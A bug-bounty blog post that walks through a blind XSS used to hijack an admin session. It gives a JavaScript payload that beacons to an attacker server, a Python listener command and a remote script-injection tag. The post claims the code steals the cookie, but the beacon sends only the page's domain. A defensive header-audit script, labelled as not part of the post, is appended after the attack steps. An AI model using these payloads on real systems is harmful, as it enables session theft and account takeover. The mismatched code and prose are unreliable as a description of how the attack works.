3000$ Blind Xss Hijack admin panel

Ahmed Najeh
2 min read, Jan 19, 2024


Hi 😊

This idea is not limited to the admin; it applies to any place where XSS can be used, whether reflected or stored, delivered via POST or GET.
But the most dangerous case is when the victim is an admin.
We all know the danger of XSS: the attacker steals the cookie, and with the victim's cookie he enters the target's account (the admin's or the user's).
So we need to write code in two parts: the first reaches out to your server, the second hands over the session cookie through JavaScript.

1- First, create a file with the .js extension on your server:

```javascript
// Visual confirmation that the script ran in the victim's origin
alert(document.domain);
// Image beacon: the browser fetches this URL, so the request (with its
// query string) lands in the listener's log on <ip>:<anyport>
var i = new Image;
i.src = "http://<ip>:<anyport>/?cookie=" + document.domain;
```

2- Start a listener with any tool such as Netcat so you can watch the incoming requests in the HTTP server log. I use a Python 3 module, as follows:

```
python3 -m http.server <port>
```

3- After the listener is up, point the payload at the .js file on your host
and call it with a second piece of JavaScript ("js code 2"), such as:

```html
<script src="http://<ip>/xss.js"></script>
```

The request will be delivered to you from the website together with the cookie, as shown in the picture.
(In the real attack scenario, I injected js code 2 into the account verification request and waited for about two hours. Once the admin opened my request, the js code was activated and I received my session cookie in the http.server log.)
An hour after the report, the vulnerability was fixed.
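From the defender's side, the two things that would have blunted this chain are an HttpOnly session cookie (script cannot read it) and a Content-Security-Policy that refuses remote `<script src>` and image beacons. The following is an added example, not code from the post, that audits constructed response headers from a hypothetical admin panel and lists which of those defences are missing:

```python
# Constructed sample headers: a weak admin-panel response beside a hardened one
WEAK_HEADERS = {
    "Set-Cookie": "session=abc123; Path=/",
    "Content-Type": "text/html; charset=utf-8",
}
HARDENED_HEADERS = {
    "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; img-src 'self'",
    "Content-Type": "text/html; charset=utf-8",
}


def parse_set_cookie(value):
    """Split a Set-Cookie value into (cookie name, {attribute_lower: value})."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name, attrs


def parse_csp(value):
    """Parse a Content-Security-Policy value into {directive: [sources]}."""
    policy = {}
    for directive in value.split(";"):
        tokens = directive.strip().split()
        if tokens:
            policy[tokens[0]] = tokens[1:]
    return policy


def audit_headers(headers):
    """Return findings for each missing defence against the blind-XSS cookie theft."""
    findings = []
    if "Set-Cookie" in headers:
        name, attrs = parse_set_cookie(headers["Set-Cookie"])
        if "httponly" not in attrs:
            findings.append(f"cookie {name} readable by script (missing HttpOnly)")
        if "secure" not in attrs:
            findings.append(f"cookie {name} sent over plain HTTP (missing Secure)")
    csp = parse_csp(headers.get("Content-Security-Policy", ""))
    script_src = csp.get("script-src", csp.get("default-src"))
    if script_src is None:
        findings.append("no CSP: <script src> from any host is allowed")
    elif any(s in ("*", "http:", "https:") for s in script_src):
        findings.append("CSP script-src allows arbitrary remote hosts")
    img_src = csp.get("img-src", csp.get("default-src"))
    if img_src is None or "*" in img_src:
        findings.append("CSP img-src unrestricted: Image beacons can reach any host")
    return findings
```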

Bounty: 3000$, together with two other bugs for the same company.

See you in the second security vulnerability of the same company.

Written by Ahmed Najeh

The man of reason suffers in comfort because of his mind, while the brother of ignorance thrives in misery. https://hackerone.com/im4x https://web.facebook.com/im4xx/
